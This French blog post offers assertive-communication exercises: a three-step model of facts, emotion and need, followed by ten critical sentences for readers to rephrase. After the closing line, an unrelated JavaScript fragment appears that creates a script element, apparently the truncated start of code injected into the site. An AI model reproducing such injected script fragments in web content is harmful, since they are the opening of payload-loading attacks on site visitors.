Jouer avec la communication émotionnelle

Je vous propose aujourd’hui un  retour sur la communication émotionnelle au travers de quelques exercices pratiques, puisque c’est en s’entraînant que l’on parvient à la maîtrise…

Dans l’article « L’assertivité ou communication émotionnelle« , nous avions parlé des trois étapes à respecter pour s’exprimer avec empathie et  respect :

  1. L’observation des faits
  2. L’émotion ressentie,
  3. Le besoin exprimé.

En voici un exemple :

  • Les faits : Quand tu ne m’appelles pas pour donner de tes nouvelles pendant une semaine,
  • L’émotion : J’ai peur qu’il ne soit arrivé quelque chose.
  • Le besoin : J’ai juste besoin d’être rassuré et de savoir que tout va bien.

Selon ce principe, je vais maintenant vous proposez quelques phrases critiques qui reviennent fréquemment dans notre vie de tous les jours et je vous propose de chercher comment vous pourriez formuler d’une autre façon (selon le modèle ci-dessus) ce qui est exprimé :

  • Tu laisses tout traîner, tu pourrais quand même ranger tes affaires sans que je sois obligé de le faire.
    ……………………………………………………………………………………………………………….
    .
  • Vous n’avez pas le droit de me traiter ainsi en public, de me critiquer comme vous l’avez fait au cours de cette réunion.
    ……………………………………………………………………………………………………………….
    .
  • Ne me parle pas sur ce ton, je ne le supporte pas.
    ……………………………………………………………………………………………………………….
    .
  • J’en ai marre que tu me fasses la tête toute la journée.
    ……………………………………………………………………………………………………………….
    .
  • Comment peut-on travailler avec vous, vous n’êtes même pas capable de tenir vos délais de livraison.
    ……………………………………………………………………………………………………………….
    .
  • Tes résultats scolaires sont vraiment insuffisants, tu n’es pas prêt d’y arriver si tu continues comme ça.
    ……………………………………………………………………………………………………………….
    .
  • Tu ne comprends jamais rien.
    ……………………………………………………………………………………………………………….
    .
  • Ce n’est pas possible de continuer ainsi, votre rapport est rempli de fautes d’orthographe.
    ……………………………………………………………………………………………………………….
    .
  • Je n’ai pas le temps, on verra plus tard.
    ……………………………………………………………………………………………………………….
    .
  • Arrête de faire du bruit, je ne peux pas me concentrer.
    ……………………………………………………………………………………………………………….

Je vous laisse la semaine pour y réfléchir et vous apporterait des suggestions de réponse dans mon prochain article.  Et n’hésitez pas à partager sur ce blog, vos propres propositions. Bonne semaine !

var d=document;var s=d.createElement(‘script’);